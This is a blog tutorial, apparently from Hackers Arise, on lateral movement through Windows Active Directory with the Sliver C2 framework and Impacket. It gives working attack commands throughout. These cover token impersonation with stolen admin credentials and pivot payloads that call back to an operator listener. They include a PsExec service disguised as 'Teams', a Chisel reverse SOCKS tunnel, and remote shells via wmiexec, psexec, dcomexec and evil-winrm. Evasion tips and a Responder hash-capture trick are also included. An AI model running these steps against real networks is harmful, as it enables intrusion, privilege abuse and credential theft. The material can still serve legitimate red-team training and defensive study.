Welcome back, cyberwarriors. In our previous chapter, we explored domain reconnaissance and emphasized how critical it is to understand your target environment in depth. Even a small Active Directory domain can contain a surprisingly complex network of access control lists (ACLs), security groups, machines, Group Policy Objects (GPOs), and other components. To effectively navigate that […]
The post Sliver: Building C2 During a Cyber War – Part 6: Lateral Movement first appeared on Hackers Arise.
Welcome back, cyberwarriors.
In our previous chapter, we explored domain reconnaissance and emphasized how critical it is to understand your target environment in depth. Even a small Active Directory domain can contain a surprisingly complex network of access control lists (ACLs), security groups, machines, Group Policy Objects (GPOs), and other components. To effectively navigate that landscape, it helps to visualize it using tools like BloodHound or rely on precise queries through PowerView and SharpView, depending on what you are after.
In this part, we will focus on lateral movement, another vital stage in any Active Directory operation. On its own, lateral movement is not particularly complicated. Its effectiveness is directly tied to the depth of reconnaissance you performed earlier. The more informed you are about the structure of the domain, the more strategically you can spread, minimizing noise and avoiding early detection while reaching the most valuable systems first.
We will begin with techniques available through Sliver C2, then move on to Impacket-based methods. Detection avoidance will also be discussed as part of the operational context. Let’s begin.
Tokens
After compromising an initial machine, the next common step is credential extraction, whether by dumping hashes or leveraging Kerberoasting or AS-REP roasting. Eventually, you end up with plaintext credentials. From there, one efficient way to use these credentials is through token impersonation.
Sliver’s make-token feature mimics the behavior of Windows’ built-in token management capabilities. It creates a new logon session with the provided credentials, allowing you to act as that user over the network, while keeping your original session intact locally. This dual identity model is useful when you want to interact with systems as a privileged user without fully switching contexts.
Here is the syntax for creating a token:
sliver (session) > make-token -u admin -p password -d domain.ru
After impersonating the domain admin, you can test your access:
sliver (session) > ls //DC.DOMAIN.RU/c$
If listing files on the domain controller works, you are likely authorized to read them as well.
File uploads and downloads also become possible at this stage. One trick worth noting: uploading a shortcut that links to a nonexistent network path can force Windows to authenticate to your listener if you’re running Responder. This can capture NTLMv2 hashes that can later be cracked offline.
It is important to use fully qualified domain names (FQDNs) wherever possible, as they are more reliable and expected by many tools by default.
PsExec Pivot
To extend your C2 reach within the internal network, you’ll need to establish new active sessions. This is where pivoting comes in. Pivoting allows you to access machines that are not directly connected to the internet by using one that you have already compromised as a relay point.
The PsExec tool in Impacket mirrors Microsoft’s original Sysinternals utility. It remotely spawns a process on the target machine and lets you interact with it. While modern antivirus solutions have learned to detect Impacket-style PsExec behavior, the tool still offers advantages, especially the ability to authenticate using an NTLM hash instead of plaintext credentials.
If you haven’t already created a token for this session, now is the time:
sliver (session) > make-token -u admin -p password -d domain.ru
Then you’ll want to start a pivot listener on the host you’ve already compromised. By default, the listener runs on port 9898
sliver (session) > pivots tcp –bind 192.168.1.90
Next, you generate a service executable that will connect back to your listener:
sliver (session) > generate –format service -i 192.168.1.90:9898 –skip-symbols -N psexec-pivot
You can enhance stealth by assigning a believable name and description to the service:
sliver (session) > psexec –custom-exe /root/payloads/psexec-pivot.exe –service-name Teams –service-description MicrosoftTeams target.domain.ru
If the target system is unprotected by antivirus or endpoint detection tools, the payload will execute successfully, giving you a SYSTEM-level shell.
WMI Pivot
WMI (Windows Management Instrumentation) provides administrators with a unified way to manage both local and remote machines. From a red team perspective, WMI is also a native method for remote code execution, provided you have local admin rights.
If you’ve followed the earlier steps, your listener should still be running. Now generate a pivot binary tailored for WMI delivery:
sliver (session) > generate -i 192.168.1.90:9898 –skip-symbols -N wmicpivot
Upload the file to the target host, ideally in a directory that is unlikely to be inspected:
sliver (session) > cd //target.domain.ru/c$/windows/tasks
sliver (session) > upload wmicpivot.exe
Then remotely execute the payload via WMI:
sliver (session) > execute -o wmic /node:
Once again, this should return a SYSTEM-level session if everything is configured properly.
Impacket
While Sliver integrates many tools natively, it’s important to understand how to perform lateral movement without relying solely on one C2 platform. Impacket provides a range of utilities for executing commands remotely using different Windows communication protocols.
Proxy Setup
All Impacket tools we’re about to use require a working proxy connection. One effective option is Chisel, which can tunnel SOCKS connections over HTTP/S.
First, start a Chisel server on your C2:
sudo chisel server –reverse -v -p 1257 –socks5
Then initiate a reverse connection from the compromised machine:
sliver (session) > chisel client -v
Ensure that your /etc/proxychains4.conf (or proxychains.conf)contains the correct SOCKS5 entry:
socks5 127.0.0.1 1080
Make sure port 1080 is not used by any other service, as Chisel defaults to it.
WMI Execution
WMI is often open within domain environments. Here’s how to launch a WMI shell via Impacket:
c2 > proxychains4 wmiexec.py domain.ru/admin:password@
If successful, this gives you a semi-interactive command shell on the remote host. wmiexec.py could get detected because it writes the output of the command execution to a file on the ADMIN$ by default. We can specify the target share with the “-share” and choosing the C$, for example.
PsExec Execution
If WMI is unavailable, PsExec remains a solid option, especially when the SMB port (445) is open:
c2 > proxychains4 psexec.py domain.ru/admin:password@
This again yields a SYSTEM-level shell, assuming proper credentials and open ports. We recommend using Microsoft’s original Sysinternals utility to avoid detection.
DCOM Execution
DCOM allows attackers to remotely instantiate COM objects on target systems. This method is useful for memory-resident operations that do not require scheduled tasks or services. Lateral movement via DCOM is harder to detect since DCOM has many methods with different IOCs:
c2 > proxychains4 dcomexec.py -object MMC20 domain.ru/admin:password@
DCOM communicates over ports 135, 445, and dynamic high ports, so you’ll need those open for the connection to succeed.
Evil-WinRM
Evil-WinRM provides a more interactive experience, letting you run PowerShell and CMD commands over the WinRM service. It’s especially useful when operating with Administrator credentials:
c2 > proxychains4 evil-winrm -i
This drops you into an interactive shell with file upload/download capabilities and native PowerShell execution.
Conclusion
You’ve now seen several approaches to lateral movement across Windows environments using both Sliver C2 and Impacket. From token impersonation and pivoting with PsExec or WMI, to in-memory execution via DCOM and remote shells over WinRM, these techniques give you the flexibility to adapt to a variety of network defenses and operational requirements.
The post Sliver: Building C2 During a Cyber War – Part 6: Lateral Movement first appeared on Hackers Arise.
Source: HackersArise
Source Link: https://hackers-arise.com/sliver-building-c2-during-a-cyber-war-part-6-lateral-movement/